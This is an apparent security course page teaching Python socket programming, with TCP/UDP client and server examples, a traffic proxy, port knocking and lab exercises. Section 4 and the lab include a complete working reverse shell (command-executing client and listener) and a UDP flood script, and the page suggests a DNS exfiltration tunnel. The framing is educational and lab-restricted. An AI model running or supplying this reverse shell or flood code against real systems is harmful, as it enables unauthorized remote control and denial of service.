Skip to content
CSY105 Week 05 Beginner

Week Content

Programming for Security

Track your progress through this week's content

Week Overview

This week dives into network programming—the foundation of offensive and defensive security tools. You'll learn to:

  • Understand TCP/IP at the socket level (beyond high-level libraries)
  • Build custom network clients and servers
  • Implement reverse shells, proxies, and network utilities
  • Handle network errors and timeouts gracefully
  • Use non-blocking sockets for concurrent connections
⚠️ Ethical Warning: Tools built this week (reverse shells, DoS testers, proxies) are powerful and potentially dangerous. Only use them in authorized lab environments or systems you own. Unauthorized use is illegal and unethical.
Real-World Context: Security tools like Metasploit, Cobalt Strike, and custom C2 frameworks are built on these socket programming fundamentals. Understanding sockets is essential for pentesting, malware analysis, and network forensics.

Section 1: OSI Model & Network Fundamentals

Quick OSI Review (Security Perspective)

From CSY104, you learned the 7-layer OSI model. For network programming in Python, we primarily work at:

  • Layer 3 (Network): IP addresses, routing (we'll work with IP packets)
  • Layer 4 (Transport): TCP/UDP ports (main focus this week)
  • Layer 7 (Application): HTTP, SSH, FTP (next week)

TCP vs UDP: Security Implications

TCP (Transmission Control Protocol)

  • ✅ Connection-oriented (3-way handshake)
  • ✅ Reliable delivery (packets acknowledged)
  • ✅ Ordered delivery
  • ⚠️ Slower (overhead from reliability)
  • Security Use: Reverse shells, C2 channels, reliable data exfiltration

UDP (User Datagram Protocol)

  • ✅ Connectionless (no handshake)
  • ❌ Unreliable (packets may be lost)
  • ❌ Unordered delivery
  • ✅ Faster (low overhead)
  • Security Use: DoS attacks, fast scanning, DNS tunneling, covert channels

Port Numbers: The Security Landscape

#!/usr/bin/env python3
"""
Common ports from a security perspective
"""

# Well-known ports (0-1023) - require root/admin privileges to bind
COMMON_PORTS = {
    20: 'FTP Data',
    21: 'FTP Control',
    22: 'SSH',               # Secure Shell - common attack target
    23: 'Telnet',            # Unencrypted - legacy, avoid
    25: 'SMTP',              # Email - phishing, spam relay testing
    53: 'DNS',               # Domain Name System - tunneling, exfiltration
    80: 'HTTP',              # Web - most tested port
    110: 'POP3',             # Email retrieval
    143: 'IMAP',             # Email retrieval
    443: 'HTTPS',            # Encrypted web - certificate analysis
    445: 'SMB',              # Windows file sharing - EternalBlue, ransomware
    3306: 'MySQL',           # Database - SQL injection testing
    3389: 'RDP',             # Remote Desktop - brute force target
    5432: 'PostgreSQL',      # Database
    5900: 'VNC',             # Remote desktop - weak auth common
    8080: 'HTTP-Alt',        # Alternative web port
}

# Registered ports (1024-49151) - user applications
SECURITY_TOOL_PORTS = {
    4444: 'Metasploit Default Payload',
    8000: 'Python SimpleHTTPServer',
    8443: 'HTTPS Alternative',
    9001: 'Tor/HSQL/Supervisord',
}

# Dynamic/Private ports (49152-65535) - ephemeral client ports
# Used by OS for outgoing connections

Section 2: Socket Programming Fundamentals

Creating Sockets

Python's socket module provides low-level network access:

#!/usr/bin/env python3
"""
Socket creation and basic operations
"""
import socket

# Create a TCP socket (IPv4)
tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Parameters explained:
# - AF_INET: IPv4 address family (use AF_INET6 for IPv6)
# - SOCK_STREAM: TCP socket (connection-oriented)

# Create a UDP socket
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# Parameters:
# - SOCK_DGRAM: UDP socket (datagram, connectionless)


# Socket options (important for security tools)
tcp_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# SO_REUSEADDR: Allow reusing address/port immediately after close
# Critical for servers that restart frequently

# Set timeout (prevents hanging on dead connections)
tcp_socket.settimeout(5.0)  # 5 second timeout

# Get socket information
print(f"Socket family: {tcp_socket.family}")    # AF_INET
print(f"Socket type: {tcp_socket.type}")        # SOCK_STREAM

# ALWAYS close sockets when done
tcp_socket.close()
udp_socket.close()

# Better: Use context managers (auto-close)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    # Use socket here
    pass
# Socket automatically closed

TCP Client

Basic TCP client connects to a server, sends data, receives response:

#!/usr/bin/env python3
"""
Simple TCP client - connects to server and exchanges data
"""
import socket

def tcp_client(target_host: str, target_port: int, message: str) -> str | None:
    """
    Send message to TCP server, return response.

    Args:
        target_host: Target IP or hostname
        target_port: Target port
        message: Message to send

    Returns:
        Server response or None on error
    """
    try:
        # Create socket
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        # Set timeout to avoid hanging
        client.settimeout(5)

        # Connect to server (3-way handshake happens here)
        print(f"[*] Connecting to {target_host}:{target_port}...")
        client.connect((target_host, target_port))

        print(f"[*] Connected! Sending: {message}")

        # Send data (encode string to bytes)
        client.send(message.encode('utf-8'))

        # Receive response (max 4096 bytes)
        response = client.recv(4096)

        # Decode bytes to string
        response_str = response.decode('utf-8', errors='ignore')

        print(f"[*] Received: {response_str}")

        # Close connection
        client.close()

        return response_str

    except socket.timeout:
        print(f"[!] Connection timeout to {target_host}:{target_port}")
        return None
    except socket.error as e:
        print(f"[!] Socket error: {e}")
        return None
    except Exception as e:
        print(f"[!] Error: {e}")
        return None


# Usage
if __name__ == '__main__':
    # Test with banner grabbing
    banner = tcp_client('scanme.nmap.org', 80, 'HEAD / HTTP/1.0\r\n\r\n')

    if banner:
        print(f"\n=== Banner ===\n{banner}")

TCP Server

TCP server listens for incoming connections and handles clients:

#!/usr/bin/env python3
"""
Simple TCP server - listens for connections and echoes data back
"""
import socket
import threading

def handle_client(client_socket: socket.socket, address: tuple) -> None:
    """
    Handle individual client connection.

    Args:
        client_socket: Connected client socket
        address: (ip, port) tuple of client
    """
    print(f"[*] Accepted connection from {address[0]}:{address[1]}")

    try:
        # Receive data from client
        data = client_socket.recv(4096)

        if data:
            message = data.decode('utf-8', errors='ignore')
            print(f"[*] Received: {message}")

            # Echo data back to client
            response = f"You sent: {message}"
            client_socket.send(response.encode('utf-8'))

    except Exception as e:
        print(f"[!] Error handling client: {e}")

    finally:
        # Always close client socket
        client_socket.close()
        print(f"[*] Connection closed: {address[0]}:{address[1]}")


def tcp_server(bind_ip: str, bind_port: int) -> None:
    """
    Start TCP server and listen for connections.

    Args:
        bind_ip: IP to bind to (0.0.0.0 = all interfaces)
        bind_port: Port to listen on
    """
    # Create server socket
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # Reuse address (important for quick restarts)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

    # Bind to address and port
    server.bind((bind_ip, bind_port))

    # Listen for connections (backlog queue = 5)
    server.listen(5)

    print(f"[*] Listening on {bind_ip}:{bind_port}")

    try:
        while True:
            # Accept incoming connection (blocks until client connects)
            client_socket, address = server.accept()

            # Handle client in separate thread (allows multiple clients)
            client_thread = threading.Thread(
                target=handle_client,
                args=(client_socket, address)
            )
            client_thread.start()

    except KeyboardInterrupt:
        print("\n[!] Server shutting down...")
    finally:
        server.close()


# Usage
if __name__ == '__main__':
    # Listen on all interfaces, port 9999
    tcp_server('0.0.0.0', 9999)

UDP Client & Server

UDP is connectionless, simpler but unreliable:

#!/usr/bin/env python3
"""
UDP client and server examples
"""
import socket

# UDP CLIENT
def udp_client(target_host: str, target_port: int, message: str) -> None:
    """
    Send UDP datagram to target.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    try:
        # No connect() needed - just send
        client.sendto(message.encode('utf-8'), (target_host, target_port))

        # Try to receive response (may timeout)
        client.settimeout(2)
        data, server = client.recvfrom(4096)

        print(f"[*] Received from {server}: {data.decode('utf-8', errors='ignore')}")

    except socket.timeout:
        print("[!] No response received")
    finally:
        client.close()


# UDP SERVER
def udp_server(bind_ip: str, bind_port: int) -> None:
    """
    Start UDP server.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    server.bind((bind_ip, bind_port))

    print(f"[*] Listening on {bind_ip}:{bind_port} (UDP)")

    try:
        while True:
            # Receive data and client address
            data, address = server.recvfrom(4096)

            print(f"[*] Received from {address[0]}:{address[1]}: {data.decode('utf-8', errors='ignore')}")

            # Send response back
            response = b"UDP ACK"
            server.sendto(response, address)

    except KeyboardInterrupt:
        print("\n[!] Server shutting down...")
    finally:
        server.close()


# Usage
if __name__ == '__main__':
    import sys

    if len(sys.argv) < 2:
        print("Usage: python script.py [client|server]")
        sys.exit(1)

    mode = sys.argv[1]

    if mode == 'server':
        udp_server('0.0.0.0', 9999)
    elif mode == 'client':
        udp_client('127.0.0.1', 9999, 'Hello UDP!')
    else:
        print("Invalid mode. Use 'client' or 'server'")

Section 3: Advanced Socket Techniques

Non-Blocking Sockets & select()

Non-blocking sockets allow handling multiple connections efficiently without threading:

#!/usr/bin/env python3
"""
Non-blocking sockets with select() for concurrent handling
"""
import socket
import select

def non_blocking_server(bind_ip: str, bind_port: int) -> None:
    """
    TCP server using select() to handle multiple clients without threads.
    """
    # Create server socket
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((bind_ip, bind_port))
    server.listen(5)

    # Make server non-blocking
    server.setblocking(False)

    print(f"[*] Non-blocking server on {bind_ip}:{bind_port}")

    # List of sockets to monitor
    sockets_list = [server]

    # Dict to store client data
    clients = {}

    try:
        while True:
            # Wait for socket to be ready (read, write, error)
            # Timeout = 1 second (check for new activity every second)
            read_sockets, write_sockets, error_sockets = select.select(
                sockets_list,  # Read list
                [],            # Write list (empty - not writing)
                sockets_list,  # Error list
                1.0            # Timeout
            )

            # Handle readable sockets
            for notified_socket in read_sockets:
                # New connection
                if notified_socket == server:
                    client_socket, client_address = server.accept()
                    client_socket.setblocking(False)

                    sockets_list.append(client_socket)
                    clients[client_socket] = client_address

                    print(f"[*] New connection: {client_address[0]}:{client_address[1]}")

                # Data from existing client
                else:
                    try:
                        data = notified_socket.recv(4096)

                        if data:
                            message = data.decode('utf-8', errors='ignore')
                            address = clients[notified_socket]
                            print(f"[*] From {address[0]}:{address[1]}: {message}")

                            # Echo back
                            notified_socket.send(f"Echo: {message}".encode('utf-8'))
                        else:
                            # Empty data = client disconnected
                            raise Exception("Client disconnected")

                    except:
                        # Remove client
                        address = clients[notified_socket]
                        print(f"[*] Connection closed: {address[0]}:{address[1]}")

                        sockets_list.remove(notified_socket)
                        del clients[notified_socket]
                        notified_socket.close()

            # Handle socket errors
            for notified_socket in error_sockets:
                sockets_list.remove(notified_socket)
                if notified_socket in clients:
                    del clients[notified_socket]
                notified_socket.close()

    except KeyboardInterrupt:
        print("\n[!] Shutting down...")
    finally:
        for sock in sockets_list:
            sock.close()


if __name__ == '__main__':
    non_blocking_server('0.0.0.0', 9999)

Binary Data with struct

For network protocols, you often need to pack/unpack binary data:

#!/usr/bin/env python3
"""
Binary data handling with struct module
"""
import socket
import struct

# Pack data into binary format
def pack_message(msg_type: int, length: int, data: bytes) -> bytes:
    """
    Pack message into binary format:
    - 2 bytes: message type (unsigned short)
    - 4 bytes: data length (unsigned int)
    - N bytes: data

    Format string:
    - '!': Network byte order (big-endian)
    - 'H': Unsigned short (2 bytes)
    - 'I': Unsigned int (4 bytes)
    """
    header = struct.pack('!HI', msg_type, length)
    return header + data


# Unpack binary data
def unpack_message(binary_data: bytes) -> tuple:
    """
    Unpack binary message.

    Returns:
        (msg_type, length, data) tuple
    """
    # Unpack header (6 bytes total: 2 + 4)
    header = binary_data[:6]
    msg_type, length = struct.unpack('!HI', header)

    # Extract data
    data = binary_data[6:6+length]

    return msg_type, length, data


# Example: Send binary message
def send_binary_message(host: str, port: int) -> None:
    """
    Send binary message to server.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))

    # Create message
    msg_type = 1  # Command message
    data = b"HELLO_SERVER"
    length = len(data)

    # Pack and send
    message = pack_message(msg_type, length, data)
    sock.send(message)

    # Receive response
    response = sock.recv(1024)
    msg_type, length, data = unpack_message(response)

    print(f"Received type {msg_type}: {data.decode('utf-8')}")

    sock.close()


# Common struct format codes
"""
Format | C Type           | Python Type | Size (bytes)
-------|------------------|-------------|-------------
!      | Network order    | (big-endian)| N/A
b      | signed char      | int         | 1
B      | unsigned char    | int         | 1
h      | short            | int         | 2
H      | unsigned short   | int         | 2
i      | int              | int         | 4
I      | unsigned int     | int         | 4
q      | long long        | int         | 8
Q      | unsigned long    | int         | 8
f      | float            | float       | 4
d      | double           | float       | 8
s      | char[]           | bytes       | varies
"""

Error Handling Best Practices

#!/usr/bin/env python3
"""
Robust network error handling
"""
import socket
import errno

def robust_tcp_client(host: str, port: int) -> None:
    """
    TCP client with comprehensive error handling.
    """
    sock = None

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)

        # Connect
        sock.connect((host, port))

        # Send data
        sock.sendall(b"GET / HTTP/1.0\r\n\r\n")

        # Receive data
        data = sock.recv(4096)
        print(data.decode('utf-8', errors='ignore'))

    except socket.timeout:
        print(f"[!] Connection timeout to {host}:{port}")

    except socket.gaierror as e:
        # DNS resolution error
        print(f"[!] DNS resolution failed for {host}: {e}")

    except ConnectionRefusedError:
        print(f"[!] Connection refused by {host}:{port} (port closed)")

    except ConnectionResetError:
        print(f"[!] Connection reset by peer")

    except BrokenPipeError:
        print(f"[!] Broken pipe (remote end closed)")

    except OSError as e:
        if e.errno == errno.ENETUNREACH:
            print(f"[!] Network unreachable")
        elif e.errno == errno.EHOSTUNREACH:
            print(f"[!] Host unreachable")
        else:
            print(f"[!] OS error: {e}")

    except Exception as e:
        print(f"[!] Unexpected error: {e}")

    finally:
        if sock:
            sock.close()

Section 4: Security Applications

Reverse Shell (Educational)

⚠️ WARNING: This is for understanding attack/defense only. Unauthorized use is illegal.

#!/usr/bin/env python3
"""
Simple reverse shell - FOR EDUCATION ONLY
Demonstrates how attackers maintain access to compromised systems
"""
import socket
import subprocess
import os

def reverse_shell_client(server_ip: str, server_port: int) -> None:
    """
    Connect back to attacker's server and provide shell access.

    This is how malware/backdoors work. Understanding this helps
    defenders detect and prevent such attacks.
    """
    try:
        # Connect to attacker's listener
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((server_ip, server_port))

        # Send banner
        sock.send(b"[*] Reverse shell connected\n")

        while True:
            # Receive command from attacker
            command = sock.recv(4096).decode('utf-8').strip()

            if not command:
                break

            if command.lower() == 'exit':
                break

            # Execute command
            try:
                # Run command and capture output
                output = subprocess.check_output(
                    command,
                    shell=True,
                    stderr=subprocess.STDOUT,
                    stdin=subprocess.DEVNULL
                )
                sock.send(output)
            except Exception as e:
                error_msg = f"Error: {str(e)}\n"
                sock.send(error_msg.encode('utf-8'))

            # Send prompt
            sock.send(b"\n>>> ")

    except Exception as e:
        pass
    finally:
        sock.close()


def reverse_shell_listener(bind_ip: str, bind_port: int) -> None:
    """
    Attacker's listener - waits for victim to connect back.
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((bind_ip, bind_port))
    server.listen(1)

    print(f"[*] Listening on {bind_ip}:{bind_port}")
    print("[*] Waiting for reverse shell connection...")

    client, address = server.accept()
    print(f"[*] Connection from {address[0]}:{address[1]}")

    try:
        while True:
            # Receive banner/output
            data = client.recv(4096)
            if not data:
                break

            print(data.decode('utf-8', errors='ignore'), end='')

            # Send command
            command = input()
            if command.lower() == 'exit':
                client.send(b'exit\n')
                break

            client.send(command.encode('utf-8') + b'\n')

    except KeyboardInterrupt:
        print("\n[!] Exiting...")
    finally:
        client.close()
        server.close()


# USAGE (in isolated lab only):
# Terminal 1 (attacker): python script.py listener
# Terminal 2 (victim):   python script.py client 127.0.0.1 4444

if __name__ == '__main__':
    import sys

    if len(sys.argv) < 2:
        print("Usage:")
        print("  Listener: python script.py listener")
        print("  Client:   python script.py client  ")
        sys.exit(1)

    mode = sys.argv[1]

    if mode == 'listener':
        reverse_shell_listener('0.0.0.0', 4444)
    elif mode == 'client' and len(sys.argv) == 4:
        reverse_shell_client(sys.argv[2], int(sys.argv[3]))
    else:
        print("Invalid arguments")

Network Proxy

Simple TCP proxy for traffic inspection/modification:

#!/usr/bin/env python3
"""
Simple TCP proxy - intercept and inspect network traffic
Useful for analyzing protocols, debugging, MITM testing
"""
import socket
import threading

def proxy_handler(client_socket, remote_host, remote_port):
    """
    Handle proxy connection - forward traffic both ways.
    """
    # Connect to remote server
    remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        remote_socket.connect((remote_host, remote_port))
        print(f"[*] Connected to {remote_host}:{remote_port}")

        # Start forwarding in both directions
        # Client -> Remote
        def forward_to_remote():
            while True:
                data = client_socket.recv(4096)
                if not data:
                    break

                print(f"[→] Client sent {len(data)} bytes")
                # Optionally inspect/modify data here
                remote_socket.send(data)

        # Remote -> Client
        def forward_to_client():
            while True:
                data = remote_socket.recv(4096)
                if not data:
                    break

                print(f"[←] Server sent {len(data)} bytes")
                # Optionally inspect/modify data here
                client_socket.send(data)

        # Run both directions concurrently
        t1 = threading.Thread(target=forward_to_remote)
        t2 = threading.Thread(target=forward_to_client)

        t1.start()
        t2.start()

        t1.join()
        t2.join()

    except Exception as e:
        print(f"[!] Proxy error: {e}")
    finally:
        client_socket.close()
        remote_socket.close()


def tcp_proxy(local_host, local_port, remote_host, remote_port):
    """
    Start TCP proxy server.

    Args:
        local_host: Interface to bind to
        local_port: Port to listen on
        remote_host: Target server IP
        remote_port: Target server port
    """
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((local_host, local_port))
    server.listen(5)

    print(f"[*] Proxy listening on {local_host}:{local_port}")
    print(f"[*] Forwarding to {remote_host}:{remote_port}")

    try:
        while True:
            client_socket, addr = server.accept()
            print(f"[*] Connection from {addr[0]}:{addr[1]}")

            # Handle in separate thread
            proxy_thread = threading.Thread(
                target=proxy_handler,
                args=(client_socket, remote_host, remote_port)
            )
            proxy_thread.start()

    except KeyboardInterrupt:
        print("\n[!] Shutting down proxy...")
    finally:
        server.close()


# Usage: python proxy.py
# Then connect to localhost:8080, traffic forwarded to target
if __name__ == '__main__':
    tcp_proxy('127.0.0.1', 8080, 'example.com', 80)

Lab 5: Network Programming

⚠️ Legal Warning: Only run these labs in authorized environments (VMs, local networks you own). Reverse shells, DoS tools, and proxies can be illegal if misused.
⏱️ 150 minutes total Difficulty: Advanced

Part 1: TCP Reverse Shell (Client/Server) (45 minutes)

Objective: Build a functional reverse shell to understand how attackers maintain access to compromised systems.

Requirements:

  1. Create reverse_shell.py with two modes:
    • Listener mode: Waits for victim to connect, provides command prompt
    • Client mode: Connects back to listener, executes commands
  2. Features:
    • Execute shell commands and return output
    • Handle errors gracefully (command not found, etc.)
    • Reconnect on disconnect (persistence)
    • Clean exit command
  3. Test in local VM only (two terminal windows)

Success Criteria:

  • Listener accepts connection from client
  • Can execute commands like ls, whoami, pwd
  • Output returned to listener correctly
  • Exit command closes connection cleanly
Hint: Command Execution
import subprocess

# Execute command and capture output
try:
    output = subprocess.check_output(
        command,
        shell=True,
        stderr=subprocess.STDOUT,  # Capture errors too
        timeout=30  # Kill after 30 seconds
    )
    return output
except subprocess.TimeoutExpired:
    return b"Error: Command timeout\n"
except Exception as e:
    return f"Error: {str(e)}\n".encode('utf-8')

Part 2: UDP Flood Tester (40 minutes)

Objective: Build a UDP flood tool to understand DoS attacks (for defensive knowledge only).

Requirements:

  1. Create udp_flood.py that:
    • Accepts target IP, port, and packet count as arguments
    • Sends rapid UDP packets to target
    • Displays packets/second rate
    • Includes rate limiting option (to avoid accidental DoS)
  2. Add monitoring mode:
    • Listen for UDP flood traffic
    • Count packets received per second
    • Alert when threshold exceeded
  3. ⚠️ Test ONLY against your own systems in isolated lab

Success Criteria:

  • Send at least 100 UDP packets/second
  • Display statistics (packets sent, bytes sent, duration)
  • Monitoring mode detects flood
  • Rate limiting works correctly
Hint: High-Speed UDP Sending
import socket
import time

def udp_flood(target_ip, target_port, packet_count, rate_limit=None):
    """
    Send UDP flood to target.

    Args:
        target_ip: Target IP
        target_port: Target port
        packet_count: Number of packets to send
        rate_limit: Max packets/second (None = unlimited)
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    # Random or fixed payload
    payload = b"X" * 1024  # 1KB packet

    start_time = time.time()
    packets_sent = 0

    for i in range(packet_count):
        sock.sendto(payload, (target_ip, target_port))
        packets_sent += 1

        # Rate limiting
        if rate_limit:
            time.sleep(1.0 / rate_limit)

        # Progress every 100 packets
        if packets_sent % 100 == 0:
            elapsed = time.time() - start_time
            pps = packets_sent / elapsed
            print(f"[*] Sent {packets_sent} packets ({pps:.2f} pps)")

    elapsed = time.time() - start_time
    print(f"\n[*] Flood complete: {packets_sent} packets in {elapsed:.2f}s")
    print(f"[*] Average rate: {packets_sent / elapsed:.2f} pps")

    sock.close()

Part 3: Simple Network Proxy (35 minutes)

Objective: Build a TCP proxy to intercept and inspect network traffic.

Requirements:

  1. Create tcp_proxy.py that:
    • Accepts local port and remote host:port as arguments
    • Forwards all traffic between client and remote server
    • Logs all traffic (hex dump or printable text)
    • Optionally modifies traffic (e.g., replace strings)
  2. Test with HTTP traffic (proxy HTTP requests to a website)
  3. Demonstrate traffic inspection (print requests/responses)

Success Criteria:

  • Proxy successfully forwards traffic
  • Log shows client requests and server responses
  • Can intercept HTTP GET/POST requests
  • Optional: Modify traffic in transit
Hint: Hex Dump Function
def hexdump(data, length=16):
    """
    Print hex dump of binary data.
    """
    result = []

    for i in range(0, len(data), length):
        chunk = data[i:i+length]

        # Hex representation
        hex_str = ' '.join(f'{b:02x}' for b in chunk)

        # ASCII representation (replace non-printable with '.')
        ascii_str = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)

        result.append(f'{i:04x}  {hex_str:<{length*3}}  {ascii_str}')

    return '\n'.join(result)


# Usage
data = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
print(hexdump(data))

Part 4: Port Knocking Implementation (30 minutes)

Objective: Implement port knocking - a security technique where ports open only after a sequence of connection attempts.

Requirements:

  1. Create port_knock_server.py:
    • Listens for connection attempts on multiple ports
    • Requires correct sequence (e.g., knock 1000, 2000, 3000 in order)
    • Opens protected port (e.g., SSH on 22) only after correct sequence
    • Resets sequence on timeout or wrong port
  2. Create port_knock_client.py:
    • Sends knock sequence to server
    • Waits between knocks
    • Connects to protected port after sequence

Success Criteria:

  • Server detects correct knock sequence
  • Protected port opens only after valid sequence
  • Sequence resets on timeout or error
  • Client successfully connects after knocking
Hint: Sequence Tracking
import time

class PortKnockServer:
    def __init__(self, sequence):
        """
        Args:
            sequence: List of ports in correct order (e.g., [1000, 2000, 3000])
        """
        self.sequence = sequence
        self.client_states = {}  # {ip: (current_step, last_knock_time)}
        self.timeout = 10  # seconds

    def process_knock(self, client_ip, port):
        """
        Process knock attempt from client.

        Returns:
            True if sequence complete, False otherwise
        """
        now = time.time()

        # Get client state
        if client_ip in self.client_states:
            step, last_time = self.client_states[client_ip]

            # Check timeout
            if now - last_time > self.timeout:
                print(f"[!] {client_ip}: Sequence timeout, resetting")
                step = 0
        else:
            step = 0

        # Check if port matches expected sequence
        if port == self.sequence[step]:
            step += 1
            print(f"[*] {client_ip}: Correct knock {step}/{len(self.sequence)}")

            # Sequence complete?
            if step == len(self.sequence):
                print(f"[✓] {client_ip}: Sequence complete! Opening protected port")
                del self.client_states[client_ip]
                return True

            # Update state
            self.client_states[client_ip] = (step, now)
        else:
            print(f"[!] {client_ip}: Wrong port {port}, expected {self.sequence[step]}")
            if client_ip in self.client_states:
                del self.client_states[client_ip]

        return False
🎯 Lab Complete! You've built foundational network tools used in offensive/defensive security. These skills enable you to understand attack vectors, build custom C2 frameworks, and develop network defenses.

📤 Deliverables:

  • reverse_shell.py - Reverse shell client and listener
  • udp_flood.py - UDP flood tool with monitoring
  • tcp_proxy.py - Network traffic proxy with logging
  • port_knock_server.py + port_knock_client.py - Port knocking implementation
  • Screenshots of each tool working

Additional Resources

Python Documentation

Network Security Resources

Practice Challenges

  • Build a multi-client chat server (like IRC)
  • Create a simple port scanner using raw sockets
  • Implement a basic VPN tunnel (encrypt traffic between client/server)
  • Build a DNS tunnel for data exfiltration (educational)

Key Takeaways

  • ✅ Sockets are the foundation of all network communication
  • ✅ TCP provides reliable, ordered delivery (use for critical data)
  • ✅ UDP is fast but unreliable (use for speed-critical applications)
  • ✅ Always handle network errors and timeouts gracefully
  • ✅ Non-blocking sockets with select() enable concurrent handling
  • struct module is essential for binary protocol work
  • ✅ Reverse shells are common malware/backdoor mechanisms
  • ✅ Understanding attack tools helps build better defenses
  • ⚠️ Never use offensive tools without authorization

Week 05 Quiz

Test your understanding of network programming basics in Python.

Format: 10 multiple-choice questions. Passing score: 70%. Time: Untimed.

Take Quiz